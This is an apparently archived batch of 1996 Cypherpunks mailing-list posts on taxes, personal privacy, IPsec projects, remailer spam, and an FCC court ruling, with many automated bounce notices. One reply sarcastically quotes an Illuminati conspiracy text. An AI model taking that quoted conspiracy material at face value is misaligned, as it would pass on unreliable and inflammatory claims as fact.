that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Tue, 12 Nov 1996 12:25:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Taxation Thought Experiment
Message-ID: <3.0.32.19961112152531.00a068b0@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Another thought experiment, comments welcomed:

o TAXES THOUGHT EXPERIMENT

 1) I generate $100 of productivity for my company
 2) Company is taxed %30, $70 left
 3) Company pay shareholders and costs, $30 is left
 4) Company pays me
 5) I pay 40% in taxes, so $18 left
 6) With $18 I can buy a $16.82 object (%07 sales tax).

Results:
 1) I see $16.82 realization from $100 productivity increase.
 * Govt. gets $49.26 of my productivity, or nearly 3 times the amount I get.
_______________________
Regards,          Our greatest glory is not in never failing, but in rising 
                  up every time we fail.  -Ralph Waldo Emerson
Joseph Reagle     http://rpcp.mit.edu/~reagle/home.html
reagle@mit.edu    E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 12 Nov 1996 15:21:46 -0800 (PST)
To: Sheldon Andrews <cypherpunks@toad.com
Subject: Re: UNSUBCRIBE CENSORSHIP
In-Reply-To: <Pine.OSF.3.91.961112171211.2337A-100000@InfoNET.st-johns.nf.ca>
Message-ID: <v03007801aeaeb75a4ae7@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:12 PM -0330 11/12/96, Sheldon Andrews wrote:
>UNSUBCRIBE CENSORSHIP

You dumbass.

This is not "CENSORSHIP"...whatever you had in mind, no such mailing list
is copied in your "To:" or "cc:" field.

Secondly, "unsubscribe" is not spelled "UNSUBCRIBE."

Thirdly, send your unsubscribe commands to the appropriate place for the
list involved, not to the list itself.

Sheldon Andrews is hereby added to the "Don't Hire" list. Hope you weren't
planning to apply for work out here.

--Tim May




To subscribe to the Cypherpunks mailing list:

-send a message to: majordomo@toad.com

-body message of: subscribe cypherpunks

To unsubscribe from the Cypherpunks mailing list:

-send a message to: majordomo@toad.com

-body message of: unsubscribe cypherpunks







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Smith <smith@sctc.com>
Date: Tue, 12 Nov 1996 13:54:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Secrecy: My life as a nym. (Was: nym blown?)
Message-ID: <199611122141.PAA27619@shade.sctc.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal Finney wrote:

: Are there other measures which parents could take while their children are
: young to get them off to a good start, privacy-wise?

I doubt it's ever too late to start. Sure, it seems as if old, crufty
bits sit on the 'Net just waiting to embarass us ("oh, yeah, maybe I
*did* post to alt.naughty.stuff 'way back then...") but there *is*
such a thing as bit rot and perhaps it really is our friend after all.

The first question, always, when evaluating security measures is to
ask "What are you trying to protect?"

This gets really weird when you don't know what the threats really
are, which is true of this situation. I don't really see "privacy"
itself as something you can pursue as an absolute objective. I think
Black Unicorn's tale illustrates this well -- he doesn't try for
non-existence, instead he describes a series of well reasoned and
consistent steps. Basically, though, it has to be a personal choice.
So it's hard to judge perfectly for another, even your own kids.

IMHO you have to find a reasonable balance for your kids. The problem
is that you don't want your kids to disappear -- there are times they
will WANT their records found. The problem is to make verification
easy when they're directly involved and difficult otherwise.

The basic and obvious rule to most of us is to control the SSN and
don't give out a correct one except when absolutely necessary.  One of
the banks in Minneapolis refuses to pay interest at all if you don't
have your SSN on file.

I toyed with the idea of manipulating birthdates, but it wasn't clear
what the benefit was. Also, it required my wife's help, and I'll defer
to Tim May's recent discussion of his'n'her anarchy if you wonder why
this might be an impediment. If the kids know their "real" birthdate
they'll *always* report it to their teachers. And if it's consistently
incorrect in school records, then what does it mean for it to be
different?

When faced with peculiar situations I try to choose a disclosure that
meets whatever the immediate requirements are but doesn't make it easy
to automatically match up records. Often the best you can do is reduce
certainty and increase the likelihood of multiple matches with other
records. It doesn't hurt if you last name is Smith here in the U.S.A.

Rick.
smith@sctc.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 12 Nov 1996 12:44:45 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: Child Protective Services and Political Views
Message-ID: <3.0b36.32.19961112154157.00766b84@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:26 AM 11/12/96 -0800, Timothy C. May wrote:
>Who knows, it may even be a
>technical crime ("contributing to the delinquency of a minor"?) to even
>discuss basic libertarian ideas with a minor. And as I said, Child
>Protective Services could quite possibly seize a child whose parents were
>sufficiently vocal about their beliefs.)

One shouldn't be vocal to public employees in any case.  Avoid them.  If
you are going to be vocal use a non government forum.  Separate your
personal life from your political life.  It's not too hard to break most of
the pointers between your physical presence and your ideological presence.
Even though an investigator could find where I sleep at night, they would
have to actually expend the resources.  My neighbors and the local cops are
unlikely to make the connection because they and I move in very different
circles and I minimize my database presence.

In any case, those stupid enough to turn their children over to the
government deserve whatever happens to them.  Even if CPS never gets
involved, the damage they do to their kids may be irreversible.  My parents
weren't that stupid in 1956 when I started school and that was at a much
lower level of knowledge of the effects of government schools.  There is no
excuse today when we can see the damage all around us.

As I said earlier today, you can reduce your risk of CPS oppression to nil
by keeping your kids out of public schools and licensed day care.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <alex@proust.suba.com>
Date: Tue, 12 Nov 1996 13:48:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: linux ipsec question
Message-ID: <199611122147.PAA06047@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


I've been off the list for quite awhile, so if this has been beat to 
death already, I apologize.

Is there any kind of consensus of opinion on the linux-ipsec project?  
What do people outside of the project think about it?

It seems like a very good thing to me, but I don't know much about s/wan, 
so my opinion isn't worth much.

I'm a little curious as to how this project fits in with other secure IP 
efforts.  Will the linux-ipsec software interoperate with other 
packages?  How does it relate to IPv6?  Policymaker?

Basically, I'm not very clear about the significance of this project.  Is 
it going to be a good package that I could use to encrypt traffic 
between offices in NY and LA, or is it going to be a package that will 
let me communicate securely with the net at large, using a well accepted 
standard?

Finally, what do you all think about the basic way this is set up?  I 
mean, does it make sense to use a linux box with two net cards to protect 
a lan?  Or should secip software be built into individual devices, like 
it is in IPv6?  Is this a standard that might get picked up by someone 
like cisco?  Etc.

Thanks...

--
Alex Strasheim, alex@proust.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 12 Nov 1996 12:56:00 -0800 (PST)
To: cypherpunks@toad.com
Subject: Mac S/WAN (encrypted ip) mailing list..
Message-ID: <v0300780caeae94c77bd4@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Sender: mac-crypto@thumper.vmeng.com
Reply-To: Vinnie Moscaritolo <vinnie@webstuff.apple.com>
Mime-Version: 1.0
Precedence: Bulk
Date: Tue, 12 Nov 1996 12:13:16 -0800
From: Vinnie Moscaritolo <vinnie@webstuff.apple.com>
To: Multiple recipients of <mac-crypto@thumper.vmeng.com>
Subject: Mac S/WAN (encrypted ip) mailing list..

hi;

as promised I have create a mailing list that will be focused on developing
secure networking technology on the Macintosh.  (ipsec,SKIP & OT etc)

there are aleady a variety of ways todo this sucessfully with opentransport
that involve createing a STREAMS modules to do ipsec.

I will refer you to http://www.cygnus.com/~gnu/swan.html for more info
about a great project that is underway that could really use a Mac
implementation.

for now , it will be an open list, you can subscribe to it by Send mail to
mailto:majordomo@thumper.vmeng.com containing the single text line

subscribe mac-swan

Expect to receive confirmation when the majordomo daemon handles on your
request.

to contibrute to this list send email to mailto:mac-swan@thumper.vmeng.com



Vinnie Moscaritolo
------------------
"friends come and friends go..but enemies accumulate."
http://www.vmeng.com/vinnie/
Fingerprint: 4FA3298150E404F2782501876EA2146A




--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Juriaan Massenza <juriaan_massenza@ctp.com>
Date: Tue, 12 Nov 1996 06:58:21 -0800 (PST)
To: "'Open Net Postmaster'" <postmaster@opennet.net.au>
Subject: RE: Returned mail: User Unknown
Message-ID: <c=GB%a=_%p=CTP%l=TRABANT-961112145705Z-259@trabant_temp.nl.ctp.com>
MIME-Version: 1.0
Content-Type: text/plain


Looking at the To: line looks to me like a smart ass more that a genuine
"unknown user" reply...



>----------
>From: 	Open Net Postmaster[SMTP:postmaster@opennet.net.au]
>Sent: 	Tuesday, November 12, 1996 9:11 AM
>To: 	cypherpunks@toad.com; owner-cypherpunks@toad.com;
>cypherpunks-errors@toad.com
>Subject: 	Returned mail: User Unknown
>
>
>The address you mailed to is no longer valid.
>This is probably because the user in question was an
>old Open Net subscriber. Open Net is NO LONGER an ISP,
>and has not been since May 1996.
>
>We have no redirection address for that user. Please
>remove them from any mailing lists you might have.
>
>This response was generated automatically.
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Mon, 11 Nov 1996 20:58:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <199611112033.MAA11915@toad.com>
Message-ID: <199611120458.PAA07737@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Mon, 11 Nov 1996 20:59:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <Pine.GSO.3.95.961111121025.1286N-100000@well.com>
Message-ID: <199611120459.PAA08022@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Mon, 11 Nov 1996 21:01:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <v03007800aead3ea8c260@[204.246.66.55]>
Message-ID: <199611120459.PAA08118@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Mon, 11 Nov 1996 20:59:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <199611120144.RAA16399@toad.com>
Message-ID: <199611120459.PAA08200@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Mon, 11 Nov 1996 21:00:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <199611112300.PAA00754@miron.vip.best.com>
Message-ID: <199611120459.PAA08279@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Mon, 11 Nov 1996 21:00:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <199611120144.RAA16388@toad.com>
Message-ID: <199611120459.PAA08296@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Mon, 11 Nov 1996 21:00:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <199611120144.RAA16395@toad.com>
Message-ID: <199611120500.QAA08315@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Mon, 11 Nov 1996 21:00:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <199611082058.MAA01697@abraham.cs.berkeley.edu>
Message-ID: <199611120500.QAA08447@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Mon, 11 Nov 1996 21:02:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <v03007801aead576335d0@[205.162.51.35]>
Message-ID: <199611120500.QAA08488@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Mon, 11 Nov 1996 21:05:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <9611082306.AA24281@su1.in.net>
Message-ID: <199611120500.QAA08585@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Mon, 11 Nov 1996 21:03:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <3283A25B.1D6E@ix.netcom.com>
Message-ID: <199611120500.QAA08600@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Mon, 11 Nov 1996 21:01:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <v03007800aea91c1473f2@[206.119.69.46]>
Message-ID: <199611120501.QAA08648@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Mon, 11 Nov 1996 21:04:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <Pine.GUL.3.95.961111155838.5269A-100000@Networking.Stanford.EDU>
Message-ID: <199611120503.QAA08913@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pzbowen@aol.com
Date: Tue, 12 Nov 1996 13:40:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: Supreme Court rules against FCC, MCI, AT&T
Message-ID: <961112163948_2080550150@emout10.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Supreme Court Rejects FCC Phone Rule Request

WASHINGTON (Reuter) - The Supreme Court Tuesday declined a request by federal
regulators and long-distance phone companies to reactivate landmark rules
intended to pry open the nation's local phone monopolies to competition. 

The denial means key terms and conditions for deregulating the $100 billion
local phone market will for now depend on the decisions of state regulators
in the 50 states -- instead of on uniform rules issued by the Federal
Communications Commission. 

It is a defeat for the FCC and long-distance giants AT&T Corp. and MCI
Communications Corp. They sought to reinstate the FCC's "interconnection"
order after a U.S. appeals court suspended key provisions pending a challenge
to the rules, and Supreme Court Justice Thomas declined to restore them. 

It is a victory for the Baby Bell companies, GTE Corp., other local carriers
and state regulators who are seeking to overturn the regulations in the St.
Louis-based appeals court. They argue the FCC unfairly snatched away from the
states the power to issue policies governing pricing and other matters. 

The rules spell out how long-distance companies, cable-TV operators,
utilities and others wanting to get into the local phone business can plug
into the local network under the new telecommunications law. 

"For all practical purposes the state have complete control over the prices
new entrants will pay to share the existing telephone networks during the
critical period when competition is supposed to begin in local telephone
markets," FCC Chairman Reed Hundt said after the high court's denial. 

The appeals court temporarily suspended the rules last month, saying the FCC
probably erred when it drafted them. 

On Oct. 31, Justice Thomas declined a request by the FCC and its
long-distance allies to lift the lower court's "stay." They separately asked
Justices Ruth Bader Ginsberg and John Paul Stevens to reconsider the request.
The justices referred the matter to the entire court. 

"The stay prevents grossly arbitrary and distored pricing rules from going
into effect and ruining the whole process," said GTE General Counsel William
Barr. "It does not delay the timetable set forth in the Telecommunications
Act of 1996 for the introduction of competition, but instead allows for a
more level playing field." 

Oral arguments in the St. Louis case are set for January. FCC Chairman Hundt
conceded Friday it was unlikely the appeals court would decide in favor of
the FCC. And he doubts the rules will be put into effect for at least 1 1/2
years, if ever, while they are fought over in the courts. 

Hundt was encouraged, however, by the actions of state regulators arbitrating
interconnection agreements between the Bells and their long-distance rivals. 

He said key provisions to the arbitration decisions issued so far are similar
to the suspended FCC rules. 

Iowa, Texas, Maryland, Virginia and Pennsylvania have been among the states
that have issued decisions that will lay the groundwork for arbitrated
agreements between the Bells and AT&T, MCI and No. 3 long-distance company
Sprint Corp. 

"There hasn't been any evidence that the states are going off and doing any
wild and crazy stuff," said analyst Robert Mayer of Deloitte & Touche
Consulting Group. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Tue, 12 Nov 1996 17:07:45 -0800 (PST)
To: cypherpunks@toad.com
Subject: Remailer Abuse Solutions
Message-ID: <v02140b04aeaec9f1fa9b@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


What do you do if you are operating a remailer and somebody complains
they are getting spammed?  That's easy, you keep a list of people that
you don't send mail to.  What's hard is if that person wants to receive
other anonymous mail.

The solution is easy: charge e-cash to send mail to certain addresses
and send the money to the owner of the account.  Never put an address
on a kill list, just raise the price of sending mail to it.  This
generates lots of positive publicity for your remailer.  People will
beg to be spammed!

And, since the remailer operator handles the financial parts of the
deal, the technically naive "victim" does not have to have specialized
knowledge or even an e-cash account.

This also eliminates the spam problem generally.  If you are plagued
by spam, create a list of names you will accept mail from.  When a
message comes in that is not on the list, return a message directing
them to send you the mail through a paying remailer.

This solves a problem for famous people, too.  They get lots of
mail but they don't have time to read it all.  How to sort it?  Raise
the price of sending a message.  (I heard that Arnold Schwarzeneggar
was once paid $1 million just to read a script and look at the set
of a movie with no obligation to act in it.)

Okay, now lets go to mailing lists.  We like to read anonymous mail
on this list, but we don't like getting spammed.  It's hard to filter
anonymous mail for obvious reasons.

The solution: don't accept anonymous mail.  Only people on the "approved"
list would be allowed to post.  People who wish to post anonymously
could then send mail through the paying remailer to people on the
"approved" list and request that their message be relayed.  Most people
on the list would be happy to accept a dollar or two to provide this
service.  This would eliminate inappropriate mail while allowing anybody
to post.

For that matter, postings to the list itself could be priced at, say,
a dollar to cut down on the noise levels.

Payments, and addresses which complicate payment, make it harder to
rely on the remailer network.  When you send a message through a
few remailers and make a faux pax on the last one, you won't know
what happened.  Did one of the remailers go down?  Did you make a
mistake?

I think I know a solution to this one, too.  If somebody wants to
get error messages, they include a random 128 bit number with their
message.  This is a different number for each remailer in the chain.
When an error occurs, the remailer distributes an error message
with the number attached.

Error message distribution is pretty easy.  The remailer operator
could publish a web page with the errors.  Or, the messages could
be bundled and made available through anonymous ftp, or mailed to
an error message mailing list, or posted to a newsgroup.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Mon, 11 Nov 1996 22:11:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <gom9wD35w165w@bwalk.dm.com>
Message-ID: <199611120611.RAA10087@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Mon, 11 Nov 1996 22:13:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <Pso9wD37w165w@bwalk.dm.com>
Message-ID: <199611120611.RAA10104@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sheldon Andrews <ebj1024@InfoNET.st-johns.nf.ca>
Date: Tue, 12 Nov 1996 12:42:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: UNSUBCRIBE CENSORSHIP
Message-ID: <Pine.OSF.3.91.961112171211.2337A-100000@InfoNET.st-johns.nf.ca>
MIME-Version: 1.0
Content-Type: text/plain


UNSUBCRIBE CENSORSHIP





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Mon, 11 Nov 1996 22:14:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <1.5.4.32.19961111203926.006af428@pop.pipeline.com>
Message-ID: <199611120613.RAA10600@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Mon, 11 Nov 1996 22:14:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <v03007803aead2dcf0204@[204.254.74.216]>
Message-ID: <199611120614.RAA10669@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Tue, 12 Nov 1996 17:21:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Not. [Was Re: Federal Reserve Bank is ILLEGAL?]
In-Reply-To: <Pine.SUN.3.95.961111234959.13077D-100000@viper.law.miami.edu>
Message-ID: <32892276.4439@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Michael Froomkin - U.Miami School of Law wrote:
> 
> On Tue, 12 Nov 1996, Doug Renner wrote:
> 
> > Are these not correct?  Anyway, there were issues other than mere
> > legality discussed, including history & practicality.  Specifically,
> > the quotes from Benjamin Franklin, Thomas Jefferson, Rothschild,
> > references to Congressional Record, etc. were what had impressed
> > me in the link below.
> 
> Bah. "Mere legallity" indeed.

But Professor Froomkin, you are igNORING the inFLUENCE of the ILLUMINATI 
and the BILDERBERGERS. The same source that supplied this imPORTANT 
information about the FED tells us the TRUTH in an earlier missive. Mere 
"legality" and mere "facts" are NOT at issue here.

http://www.hevanet.com/nitehawk/nwo4.html

|ADAM WISEHOPHF, Professor at Germany's Ingolstadt University, founded 
|The Order of the Illuminati on May 1, 1776. This man designed the very
|plan of world domination that is still in use today to enslave the 
|world's masses. Here, upon establishing his "Order of the Illuminati", 
|he smugly reflects on his "conning" the gullible Christians of his day,
|saying: 
|
|"The most wonderful thing of all is that the distinguished Lutheran and 
|Calvinist theologians who belong to our order really believe that they 
|see in it (Illuminati) the true and genuine sense of Christian 
|Religion. Oh mortal man, is there anything you cannot be made to 
|believe?" 
|
|Evidently not! And a high percentage of Christians today are still 
|being conned in the same way. One prime example of this are the 
|millions of Christians, and most church denominations, who have fallen 
|for the NWO plan of a "One World RELIGION", being spearheaded by the 
|United Nations' National and World Counsel of Churches, behind the 
|battle cry of ecumenicalism. 
|
|Watch the future and we will see only small groups of spiritual Ameri- 
|cans, who will resist following the millions of "religious" lambs to 
|the slaughter. The Lord of the Bible always warned His people to never 
|follow the MULTITUDE. 

As everyone on cypherPUNKS KNOWS, to every conspiracy theory there IS a 
grain of TRUTH. We as a people MUST understand the TRUTH and fulfill our 
DESTINY. FREE AMERICA! http://www.nswpp.org/

> > Or am I just making that common but incorrect assumption that
> > unconstitutionality entails illegality?
> 
> No, I'm afraid you are making the common but incorrect assumption that
> reading some part of one court case from the dustbin of history out of
> context makes you a constitutional expert.

I seriously doubt he believes that. Or anything else he's spouting off 
about.

> > Thanks for responding to this thread, Michael.  Your input is very
> > much valued.
> 
> You may feel differently as I get grumpier...

Believe me, you're being far too kind.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Bell <dbell@maths.tcd.ie>
Date: Tue, 12 Nov 1996 09:36:13 -0800 (PST)
To: Peter Hendrickson <cypherpunks@toad.com>
Subject: Re: "Messer im Kopf"
In-Reply-To: <v02140b01aead9ffb76fb@[192.0.2.1]>
Message-ID: <9611121734.aa17916@salmon.maths.tcd.ie>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

	The film is listed in the Internet Movie Database (http://www.imdb.com)
which lists "The Entertainment Connection" and "Videoflicks Movie Store" as
distributors. The IMDB also provides links to both distributors' home pages.

	Derek

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv

iQCVAgUBMoi1IlXdSMogwMcZAQEnPwP9FzbcDOmI5Z8+0/LliNCjyvoheSVcEqwG
pkJgXkhZt959pupVXey1lIbF7cg4S8DUZMvLTjv7HBAdPmJ+BULqrtHJa4KsaOp1
fz1pm5E6V9mPpUWojOsDFsXOoskypjCHB98wFYjRo+jv4y2LX8iq54wVMjIMaYHK
5I5+R9yhqOw=
=vtYP
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Tue, 12 Nov 1996 17:39:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: WebTV a "munition"
Message-ID: <199611130138.RAA14014@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


